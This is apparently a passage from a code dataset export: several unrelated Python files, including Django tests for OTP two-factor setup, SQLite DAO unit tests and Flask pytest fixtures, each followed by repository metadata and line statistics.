            response_type='V1alpha1RepoCreds', # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
| 43.501002
| 136
| 0.597227
| 2,327
| 21,707
| 5.323593
| 0.084658
| 0.038101
| 0.057636
| 0.02906
| 0.927107
| 0.920972
| 0.900872
| 0.877381
| 0.872861
| 0.858411
| 0
| 0.015041
| 0.332289
| 21,707
| 498
| 137
| 43.588353
| 0.839658
| 0.4546
| 0
| 0.70339
| 1
| 0
| 0.16356
| 0.054679
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038136
| false
| 0
| 0.021186
| 0
| 0.097458
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
77b0ceffdda28b89735a6359cb183588966ab8ae
| 123
|
py
|
Python
|
tensorlayer/app/__init__.py
|
dalonsoa/tensorlayer
|
066c09be1eea1b49914b2a6e806329a599edce58
|
[
"Apache-2.0"
] | null | null | null |
tensorlayer/app/__init__.py
|
dalonsoa/tensorlayer
|
066c09be1eea1b49914b2a6e806329a599edce58
|
[
"Apache-2.0"
] | null | null | null |
tensorlayer/app/__init__.py
|
dalonsoa/tensorlayer
|
066c09be1eea1b49914b2a6e806329a599edce58
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/python
# -*- coding: utf-8 -*-
from .computer_vision_object_detection import *
from .computer_vision import *
| 20.5
| 47
| 0.723577
| 16
| 123
| 5.3125
| 0.75
| 0.282353
| 0.423529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009346
| 0.130081
| 123
| 5
| 48
| 24.6
| 0.785047
| 0.317073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
77b79be30d259e24c757639448b1322cb1c40629
| 50
|
py
|
Python
|
excel_importer/api.py
|
africlouds/excel_importer
|
7452a49b3703ee57d4e8b1cfeab57c76a26ff8c9
|
[
"MIT"
] | null | null | null |
excel_importer/api.py
|
africlouds/excel_importer
|
7452a49b3703ee57d4e8b1cfeab57c76a26ff8c9
|
[
"MIT"
] | null | null | null |
excel_importer/api.py
|
africlouds/excel_importer
|
7452a49b3703ee57d4e8b1cfeab57c76a26ff8c9
|
[
"MIT"
] | null | null | null |
import frappe
def import_excel_file():
    """Placeholder for the Excel-import entry point; performs no work yet."""
    return None
| 8.333333
| 24
| 0.72
| 7
| 50
| 4.857143
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.22
| 50
| 5
| 25
| 10
| 0.871795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.666667
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
ae0004ac3c91546591c5faa7e4361a6bfea87db3
| 139
|
py
|
Python
|
client/gefyra/api/__init__.py
|
gefyrahq/gefyra
|
0bc205b4b01100c640081ead671bdb195761299b
|
[
"Apache-2.0"
] | 41
|
2022-03-24T15:45:56.000Z
|
2022-03-31T08:07:19.000Z
|
client/gefyra/api/__init__.py
|
SteinRobert/gefyra
|
9f7076d518ef7a543ee9a6607cc1a1a6964d5807
|
[
"Apache-2.0"
] | 23
|
2021-12-02T10:29:09.000Z
|
2022-03-17T18:10:57.000Z
|
client/gefyra/api/__init__.py
|
SteinRobert/gefyra
|
9f7076d518ef7a543ee9a6607cc1a1a6964d5807
|
[
"Apache-2.0"
] | 3
|
2022-02-18T21:16:10.000Z
|
2022-03-09T22:46:28.000Z
|
from .bridge import * # noqa
from .down import * # noqa
from .up import * # noqa
from .list import * # noqa
from .run import * # noqa
| 23.166667
| 29
| 0.640288
| 20
| 139
| 4.45
| 0.4
| 0.561798
| 0.629213
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.251799
| 139
| 5
| 30
| 27.8
| 0.855769
| 0.172662
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7adc34e5afa8e4bc0e0fd78343c4e204bc5b2449
| 81
|
py
|
Python
|
shrimpy/__init__.py
|
cwm9cwm9/shrimpy-python
|
8edabbf1c06a29e73d9bf0a30db82bf48d9ef2a5
|
[
"MIT"
] | 128
|
2019-07-10T06:31:54.000Z
|
2022-03-06T04:25:39.000Z
|
shrimpy/__init__.py
|
johnjdailey/shrimpy-python
|
10a942b14dd88102564460d60c25cc10123fc448
|
[
"MIT"
] | 16
|
2020-04-29T12:31:18.000Z
|
2021-12-03T03:33:31.000Z
|
shrimpy/__init__.py
|
johnjdailey/shrimpy-python
|
10a942b14dd88102564460d60c25cc10123fc448
|
[
"MIT"
] | 41
|
2019-10-29T20:51:22.000Z
|
2022-03-14T03:44:11.000Z
|
from shrimpy.shrimpy_api_client import *
from shrimpy.shrimpy_ws_client import *
| 27
| 40
| 0.851852
| 12
| 81
| 5.416667
| 0.5
| 0.338462
| 0.553846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098765
| 81
| 2
| 41
| 40.5
| 0.890411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bb561d559c689a527df4359e7e4751e27a070b34
| 3,625
|
py
|
Python
|
src/tests/dao_test/unverified_reminder_history_dao_test.py
|
Veloxization/likahbot
|
24e22711f514fc0878cf6fb9e516ad44425ea6a7
|
[
"MIT"
] | null | null | null |
src/tests/dao_test/unverified_reminder_history_dao_test.py
|
Veloxization/likahbot
|
24e22711f514fc0878cf6fb9e516ad44425ea6a7
|
[
"MIT"
] | null | null | null |
src/tests/dao_test/unverified_reminder_history_dao_test.py
|
Veloxization/likahbot
|
24e22711f514fc0878cf6fb9e516ad44425ea6a7
|
[
"MIT"
] | null | null | null |
import unittest
import os
from dao.unverified_reminder_history_dao import UnverifiedReminderHistoryDAO
from dao.unverified_reminder_messages_dao import UnverifiedReminderMessagesDAO
class TestUnverifiedReminderHistoryDAO(unittest.TestCase):
    """Tests for UnverifiedReminderHistoryDAO against a throwaway SQLite DB."""
    def setUp(self):
        """Create the test database and seed one reminder message per guild.

        Guild 1234 and guild 2345 each get one reminder message; their row
        ids are kept in self.message_id / self.message_id2 for the tests.
        """
        self.db_addr = "database/test_db.db"
        # NOTE(review): os.popen starts the sqlite3 shell asynchronously;
        # this assumes the schema load finishes before the first DAO call —
        # confirm, or wait on the pipe, if tests turn flaky.
        os.popen(f"sqlite3 {self.db_addr} < database/schema.sql")
        self.unverified_reminder_history_dao = UnverifiedReminderHistoryDAO(self.db_addr)
        self.unverified_reminder_messages_dao = UnverifiedReminderMessagesDAO(self.db_addr)
        self.unverified_reminder_messages_dao.add_guild_unverified_reminder_message(1234, "Test", 0)
        self.message_id = self.unverified_reminder_messages_dao.get_guild_unverified_reminder_messages(1234)[0]["id"]
        self.unverified_reminder_messages_dao.add_guild_unverified_reminder_message(2345, "Test", 0)
        self.message_id2 = self.unverified_reminder_messages_dao.get_guild_unverified_reminder_messages(2345)[0]["id"]
    def tearDown(self):
        """Empty both tables so each test starts from a clean slate."""
        self.unverified_reminder_history_dao.clear_unverified_reminder_history_table()
        self.unverified_reminder_messages_dao.clear_unverified_reminder_messages_table()
    def test_member_reminder_history_is_added_to_correctly(self):
        """Adding a history entry makes it visible for that member/guild."""
        reminder_history = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 1234)
        self.assertEqual(len(reminder_history), 0)
        self.unverified_reminder_history_dao.add_to_member_reminder_history(9876, self.message_id)
        reminder_history = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 1234)
        self.assertEqual(len(reminder_history), 1)
    def test_member_reminder_history_is_deleted_correctly(self):
        """Deleting one member's history leaves other members' history intact."""
        self.unverified_reminder_history_dao.add_to_member_reminder_history(9876, self.message_id)
        self.unverified_reminder_history_dao.add_to_member_reminder_history(8765, self.message_id)
        reminder_history1 = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 1234)
        reminder_history2 = self.unverified_reminder_history_dao.get_member_reminder_history(8765, 1234)
        self.assertEqual(len(reminder_history1), 1)
        self.assertEqual(len(reminder_history2), 1)
        # Only member 9876's rows should be removed.
        self.unverified_reminder_history_dao.delete_member_reminder_history(9876, 1234)
        reminder_history1 = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 1234)
        reminder_history2 = self.unverified_reminder_history_dao.get_member_reminder_history(8765, 1234)
        self.assertEqual(len(reminder_history1), 0)
        self.assertEqual(len(reminder_history2), 1)
    def test_guild_reminder_history_is_deleted_correctly(self):
        """Deleting one guild's history leaves other guilds' history intact."""
        self.unverified_reminder_history_dao.add_to_member_reminder_history(9876, self.message_id)
        self.unverified_reminder_history_dao.add_to_member_reminder_history(9876, self.message_id2)
        reminder_history1 = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 1234)
        reminder_history2 = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 2345)
        self.assertEqual(len(reminder_history1), 1)
        self.assertEqual(len(reminder_history2), 1)
        # Only guild 1234's rows should be removed.
        self.unverified_reminder_history_dao.delete_guild_reminder_history(1234)
        reminder_history1 = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 1234)
        reminder_history2 = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 2345)
        self.assertEqual(len(reminder_history1), 0)
        self.assertEqual(len(reminder_history2), 1)
| 68.396226
| 118
| 0.806897
| 452
| 3,625
| 6.002212
| 0.115044
| 0.248802
| 0.202728
| 0.206414
| 0.796535
| 0.772576
| 0.728714
| 0.728714
| 0.709178
| 0.709178
| 0
| 0.050629
| 0.122759
| 3,625
| 52
| 119
| 69.711538
| 0.802516
| 0
| 0
| 0.446809
| 0
| 0
| 0.02069
| 0
| 0
| 0
| 0
| 0
| 0.212766
| 1
| 0.106383
| false
| 0
| 0.085106
| 0
| 0.212766
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2475c6d1ccbe772c3014da01ad59344b9dd00b2d
| 12,911
|
py
|
Python
|
Functie/test_2fa.py
|
RamonvdW/nhb-apps
|
5a9f840bfe066cd964174515c06b806a7b170c69
|
[
"BSD-3-Clause-Clear"
] | 1
|
2021-12-22T13:11:12.000Z
|
2021-12-22T13:11:12.000Z
|
Functie/test_2fa.py
|
RamonvdW/nhb-apps
|
5a9f840bfe066cd964174515c06b806a7b170c69
|
[
"BSD-3-Clause-Clear"
] | 9
|
2020-10-28T07:07:05.000Z
|
2021-06-28T20:05:37.000Z
|
Functie/test_2fa.py
|
RamonvdW/nhb-apps
|
5a9f840bfe066cd964174515c06b806a7b170c69
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2019-2021 Ramon van der Winkel.
# All rights reserved.
# Licensed under BSD-3-Clause-Clear. See LICENSE file for details.
from django.test import TestCase
from Account.models import Account
from TestHelpers.e2ehelpers import E2EHelpers
from TestHelpers import testdata
import pyotp
def get_otp_code(account):
    """Return the current time-based OTP code for *account*'s stored secret."""
    return pyotp.TOTP(account.otp_code).now()
class TestFunctie2FA(E2EHelpers, TestCase):
    """ Unit tests for the Functie application, OTP / 2FA module """

    # tests that must run before this module's tests
    test_after = ('Account', 'Functie.test_rol')

    # URLs under test
    url_koppel_stap1 = '/functie/otp-koppelen-stap1/'
    url_koppel_stap2 = '/functie/otp-koppelen-stap2/'
    url_koppel_stap3 = '/functie/otp-koppelen-stap3/'
    url_controle = '/functie/otp-controle/'

    @classmethod
    def setUpTestData(cls):
        # created once for the whole class: an admin account via the helper
        cls.testdata = testdata.TestData()
        cls.testdata.maak_accounts()

    def setUp(self):
        """ initialisation of the test case """
        self.account_normaal = self.e2e_create_account('normaal', 'normaal@test.com', 'Normaal')

        # start every test with the admin account's OTP coupling reset
        self.testdata.account_admin.otp_code = ""
        self.testdata.account_admin.otp_is_actief = False
        self.testdata.account_admin.save()

        # likewise for the normal account
        self.account_normaal.otp_code = ""
        self.account_normaal.otp_is_actief = False
        self.account_normaal.save()

    def test_2fa_koppelen_niet_ingelogd(self):
        """All OTP-coupling pages redirect anonymous visitors to the plein."""
        self.e2e_logout()

        # check redirect to the plein, because the user is not logged in
        with self.assert_max_queries(20):
            resp = self.client.get(self.url_koppel_stap1)
        self.assert_is_redirect(resp, '/plein/')

        with self.assert_max_queries(20):
            resp = self.client.get(self.url_koppel_stap2)
        self.assert_is_redirect(resp, '/plein/')

        with self.assert_max_queries(20):
            resp = self.client.get(self.url_koppel_stap3)
        self.assert_is_redirect(resp, '/plein/')

        with self.assert_max_queries(20):
            resp = self.client.post(self.url_koppel_stap3, {'otp_code': '123456'})
        self.assert_is_redirect(resp, '/plein/')

    def test_2fa_koppelen_niet_nodig(self):
        """Accounts that do not need OTP are denied access (403) to the coupling pages."""
        self.e2e_login(self.account_normaal)

        # access is denied because OTP coupling is not needed for this account
        with self.assert_max_queries(20):
            resp = self.client.get(self.url_koppel_stap1)
        self.assert403(resp)

        with self.assert_max_queries(20):
            resp = self.client.get(self.url_koppel_stap2)
        self.assert403(resp)

        with self.assert_max_queries(20):
            resp = self.client.get(self.url_koppel_stap3)
        self.assert403(resp)

        with self.assert_max_queries(20):
            resp = self.client.post(self.url_koppel_stap3, {'otp_code': '123456'})
        self.assert403(resp)

    def test_2fa_koppelen(self):
        """Walk through the full coupling flow: uitleg, QR scan, code entry."""
        # OTP coupling was reset in setUp

        # log in
        self.e2e_login(self.testdata.account_admin)

        # check that coupling is possible (step 1: explanation page)
        with self.assert_max_queries(20):
            resp = self.client.get(self.url_koppel_stap1)
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('functie/otp-koppelen-stap1-uitleg.dtl', 'plein/site_layout.dtl'))
        self.assert_html_ok(resp)

        # step 2: the QR-code page
        with self.assert_max_queries(20):
            resp = self.client.get(self.url_koppel_stap2)
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('functie/otp-koppelen-stap2-scan-qr-code.dtl', 'plein/site_layout.dtl'))
        self.assert_html_ok(resp)

        # check that the OTP secret has been created as a side effect of step 2
        self.testdata.account_admin = Account.objects.get(username='admin')
        self.assertNotEqual(self.testdata.account_admin.otp_code, '')

        # step 3: code entry page
        with self.assert_max_queries(20):
            resp = self.client.get(self.url_koppel_stap3)
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('functie/otp-koppelen-stap3-code-invoeren.dtl', 'plein/site_layout.dtl'))
        self.assert_html_ok(resp)

        # submit an illegal (too short) otp code: form error, no "wrong code" text
        with self.assert_max_queries(20):
            resp = self.client.post(self.url_koppel_stap3, {'otp_code': '123'})
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('functie/otp-koppelen-stap3-code-invoeren.dtl', 'plein/site_layout.dtl'))
        self.assertNotContains(resp, 'Verkeerde code. Probeer het nog eens')

        self.testdata.account_admin = Account.objects.get(username='admin')
        self.assertFalse(self.testdata.account_admin.otp_is_actief)

        # submit a wrong otp code: page re-shown with the "wrong code" message
        with self.assert_max_queries(20):
            resp = self.client.post(self.url_koppel_stap3, {'otp_code': '123456'})
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('functie/otp-koppelen-stap3-code-invoeren.dtl', 'plein/site_layout.dtl'))
        self.assertContains(resp, 'Verkeerde code. Probeer het nog eens')
        self.assert_html_ok(resp)

        self.testdata.account_admin = Account.objects.get(username='admin')
        self.assertFalse(self.testdata.account_admin.otp_is_actief)

        # correct otp code: coupling succeeds and otp_is_actief flips to True
        code = get_otp_code(self.testdata.account_admin)
        with self.assert_max_queries(20):
            resp = self.client.post(self.url_koppel_stap3, {'otp_code': code}, follow=True)
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('functie/otp-koppelen-gelukt.dtl', 'plein/site_layout.dtl'))
        self.assert_html_ok(resp)

        self.testdata.account_admin = Account.objects.get(username='admin')
        self.assertTrue(self.testdata.account_admin.otp_is_actief)

        self.e2e_assert_other_http_commands_not_supported(self.url_koppel_stap1)
        self.e2e_assert_other_http_commands_not_supported(self.url_koppel_stap2)
        self.e2e_assert_other_http_commands_not_supported(self.url_koppel_stap3, post=False)

    def test_2fa_koppelen_al_gekoppeld(self):
        """Attempting to couple again when OTP is already active redirects to the plein."""
        # establish the OTP coupling
        self.testdata.account_admin.otp_is_actief = True
        self.testdata.account_admin.otp_code = 'xx'
        self.testdata.account_admin.save()

        # login and pass OTP
        self.e2e_login_and_pass_otp(self.testdata.account_admin)
        # TODO: find an e2e way to verify that the account needs OTP
        # self.assertTrue(account_needs_otp(self.account_admin))
        # TODO: find an e2e way to verify that the account passed the OTP check
        # self.assertTrue(user_is_otp_verified(self.client))

        # try OTP coupling while it is already done
        # post
        code = get_otp_code(self.testdata.account_admin)
        with self.assert_max_queries(20):
            resp = self.client.post(self.url_koppel_stap3, {'otp_code': code})
        self.assert_is_redirect(resp, '/plein/')

        # get
        with self.assert_max_queries(20):
            resp = self.client.get(self.url_koppel_stap1)
        self.assert_is_redirect(resp, '/plein/')

        with self.assert_max_queries(20):
            resp = self.client.get(self.url_koppel_stap2)
        self.assert_is_redirect(resp, '/plein/')

        with self.assert_max_queries(20):
            resp = self.client.get(self.url_koppel_stap3)
        self.assert_is_redirect(resp, '/plein/')

    def test_2fa_controle_niet_ingelogd(self):
        """The OTP check page sends anonymous visitors to the visitor plein."""
        self.e2e_logout()

        # check redirect to the plein, because the user is not logged in
        with self.assert_max_queries(20):
            resp = self.client.get(self.url_controle, follow=True)
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('plein/plein-bezoeker.dtl', 'plein/site_layout.dtl'))

        with self.assert_max_queries(20):
            resp = self.client.post(self.url_controle, {'otp_code': '123456'}, follow=True)
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('plein/plein-bezoeker.dtl', 'plein/site_layout.dtl'))

    def test_2fa_controle_niet_nodig(self):
        """Accounts without OTP are redirected away from the OTP check page."""
        self.e2e_login(self.account_normaal)

        # redirected to the plein, because OTP is not needed for this account
        with self.assert_max_queries(20):
            resp = self.client.get(self.url_controle, follow=True)
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('plein/plein-bezoeker.dtl', 'plein/site_layout.dtl'))

        with self.assert_max_queries(20):
            resp = self.client.post(self.url_controle, {'otp_code': '123456'}, follow=True)
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('plein/plein-bezoeker.dtl', 'plein/site_layout.dtl'))

    def test_2fa_controle(self):
        """Exercise the OTP check form: missing, empty, illegal, wrong and correct codes."""
        self.testdata.account_admin.otp_is_actief = True
        self.testdata.account_admin.otp_code = "ABCDEFGHIJKLMNOP"
        self.testdata.account_admin.save()

        self.e2e_login(self.testdata.account_admin)

        # fetch the OTP check page
        with self.assert_max_queries(20):
            resp = self.client.get(self.url_controle)
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('functie/otp-controle.dtl', 'plein/site_layout.dtl'))

        # no code field at all
        with self.assert_max_queries(20):
            resp = self.client.post(self.url_controle, {'jaja': 'nee'})
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('functie/otp-controle.dtl', 'plein/site_layout.dtl'))
        self.assertContains(resp, "De gegevens worden niet geaccepteerd")

        # empty code
        with self.assert_max_queries(20):
            resp = self.client.post(self.url_controle, {'otp_code': ''})
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('functie/otp-controle.dtl', 'plein/site_layout.dtl'))
        self.assertContains(resp, "De gegevens worden niet geaccepteerd")

        # illegal (non-numeric) code
        with self.assert_max_queries(20):
            resp = self.client.post(self.url_controle, {'otp_code': 'ABCDEF'})
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('functie/otp-controle.dtl', 'plein/site_layout.dtl'))
        self.assertContains(resp, "Voer de vereiste code in")

        # wrong code
        with self.assert_max_queries(20):
            resp = self.client.post(self.url_controle, {'otp_code': '123456'})
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('functie/otp-controle.dtl', 'plein/site_layout.dtl'))
        self.assertContains(resp, "Verkeerde code. Probeer het nog eens.")

        # correct otp code
        code = get_otp_code(self.testdata.account_admin)
        with self.assert_max_queries(25):  # slightly higher because of follow=True
            resp = self.client.post(self.url_controle, {'otp_code': code}, follow=True)
        self.assertEqual(resp.status_code, 200)  # 200 = OK
        self.assert_template_used(resp, ('functie/wissel-van-rol.dtl', 'plein/site_layout.dtl'))

        # correct otp code + next url
        code = get_otp_code(self.testdata.account_admin)
        with self.assert_max_queries(20):
            resp = self.client.post(self.url_controle, {'otp_code': code, 'next_url': '/records/iets/'})
        self.assertEqual(resp.status_code, 302)
        self.assert_is_redirect(resp, '/records/iets/')

        self.e2e_assert_other_http_commands_not_supported(self.url_controle, post=False)

    def test_qrcode_te_groot(self):
        """QR-code generation still works with maximum-length username and issuer name."""
        # log in with a username of the full 50-character length
        self.testdata.account_admin.username = 'volledige_lengte_gebruikt_van_50_tekens__erg_lange'
        self.testdata.account_admin.save()
        self.e2e_login(self.testdata.account_admin)

        with self.settings(OTP_ISSUER_NAME='erg_lange_otp_issuer_naam_van_50_tekens__erg_lange'):
            # check that coupling is possible
            with self.assert_max_queries(20):
                resp = self.client.get(self.url_koppel_stap2)
            self.assertEqual(resp.status_code, 200)  # 200 = OK
            self.assert_template_used(resp, ('functie/otp-koppelen-stap2-scan-qr-code.dtl', 'plein/site_layout.dtl'))
            self.assert_html_ok(resp)

            with self.assert_max_queries(20):
                resp = self.client.get(self.url_koppel_stap3)
            self.assertEqual(resp.status_code, 200)  # 200 = OK
            self.assert_template_used(resp, ('functie/otp-koppelen-stap3-code-invoeren.dtl', 'plein/site_layout.dtl'))
            self.assert_html_ok(resp)

# end of file
| 44.829861
| 118
| 0.674386
| 1,708
| 12,911
| 4.862412
| 0.122365
| 0.078266
| 0.052258
| 0.063456
| 0.813606
| 0.783865
| 0.768573
| 0.75581
| 0.751716
| 0.746297
| 0
| 0.029658
| 0.213926
| 12,911
| 287
| 119
| 44.986063
| 0.788649
| 0.109442
| 0
| 0.666667
| 0
| 0
| 0.148692
| 0.101111
| 0
| 0
| 0
| 0.003484
| 0.53125
| 1
| 0.057292
| false
| 0.005208
| 0.026042
| 0
| 0.119792
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2496e10a59621ed9581833cd97a25d4397aa2bd8
| 38
|
py
|
Python
|
examples/my_package/__init__.py
|
jamesabel/sundry
|
4f63bfa0624c88a3cd05adf2784e9e3e66e094f4
|
[
"MIT"
] | 2
|
2019-10-02T06:30:27.000Z
|
2021-07-10T22:39:30.000Z
|
examples/my_package/__init__.py
|
jamesabel/sundry
|
4f63bfa0624c88a3cd05adf2784e9e3e66e094f4
|
[
"MIT"
] | 3
|
2019-03-13T17:15:58.000Z
|
2019-06-04T20:26:57.000Z
|
examples/my_package/__init__.py
|
jamesabel/sundry
|
4f63bfa0624c88a3cd05adf2784e9e3e66e094f4
|
[
"MIT"
] | 1
|
2019-03-08T21:37:29.000Z
|
2019-03-08T21:37:29.000Z
|
from .my_function import my_function
| 12.666667
| 36
| 0.842105
| 6
| 38
| 5
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131579
| 38
| 2
| 37
| 19
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
24b2270d41597603a877636c2bd29cdd599156de
| 201,076
|
py
|
Python
|
tests/conftest.py
|
docknetwork/verifiable-claims-engine
|
1aab94510f421ce131642b64aefcd9a21c888f23
|
[
"MIT"
] | 5
|
2019-10-21T18:17:38.000Z
|
2020-12-09T06:40:32.000Z
|
tests/conftest.py
|
docknetwork/verifiable-claims-engine
|
1aab94510f421ce131642b64aefcd9a21c888f23
|
[
"MIT"
] | 4
|
2019-11-01T20:10:54.000Z
|
2020-01-21T20:41:00.000Z
|
tests/conftest.py
|
docknetwork/verifiable-claims-engine
|
1aab94510f421ce131642b64aefcd9a21c888f23
|
[
"MIT"
] | 2
|
2020-02-02T20:00:46.000Z
|
2020-02-12T10:12:05.000Z
|
import os
from collections import OrderedDict
from typing import Type, Dict, List
import flask.testing
import pytest
from attrdict import AttrDict
from flaskapp.app import create_app
from flaskapp.errors import AppError
from tests.helpers import JsonFlaskClient
class Response(object):
    """Lightweight fake of an HTTP response.

    Exposes the minimal interface the tests rely on: ``status_code``,
    a callable ``json()`` returning the payload, and ``content`` as the
    string form of that payload.
    """

    def __init__(self, code, data_dict):
        self.status_code = code
        self.content = str(data_dict)

        def _json():
            return data_dict

        # callable attribute, mirroring requests.Response.json()
        self.json = _json
@pytest.fixture
def app():
    """Yield a Flask app configured for testing against Ethereum Ropsten.

    Keys, node URLs and API tokens are pulled from the environment so that
    no secrets live in the repository.
    """
    env = os.environ.get
    config = {
        'TESTING': True,
        'DEBUG': True,
        'BLOCKCHAIN': 'ethereum_ropsten',
        'ETH_NODE_URL_ROPSTEN': env('ETH_NODE_URL_ROPSTEN'),
        'ETH_PUBLIC_KEY': env('ETH_PUBLIC_KEY'),
        'ETH_PRIVATE_KEY': env('ETH_PRIVATE_KEY'),
        'ETH_KEY_CREATED_AT': env('ETH_KEY_CREATED_AT'),
        'ETHERSCAN_API_TOKEN': env('ETHERSCAN_API_TOKEN'),
    }
    yield create_app(config_data=config)
@pytest.fixture
def json_client(client) -> JsonFlaskClient:
    """Wrap the plain Flask test client in a JSON-aware helper client."""
    wrapped = JsonFlaskClient(client)
    return wrapped
@pytest.fixture
def issuer() -> Dict:
yield AttrDict({
"name": "Verifiable",
"main_url": "https://verifiable.com",
"id": "https://gist.githubusercontent.com/faustow/643a48d909a095bbf08620ee392b8097/raw/c9acdf8f866f5a77382bedd606d9c0a084c8195c/test_issuer.json",
"email": "hello@verifiable.com",
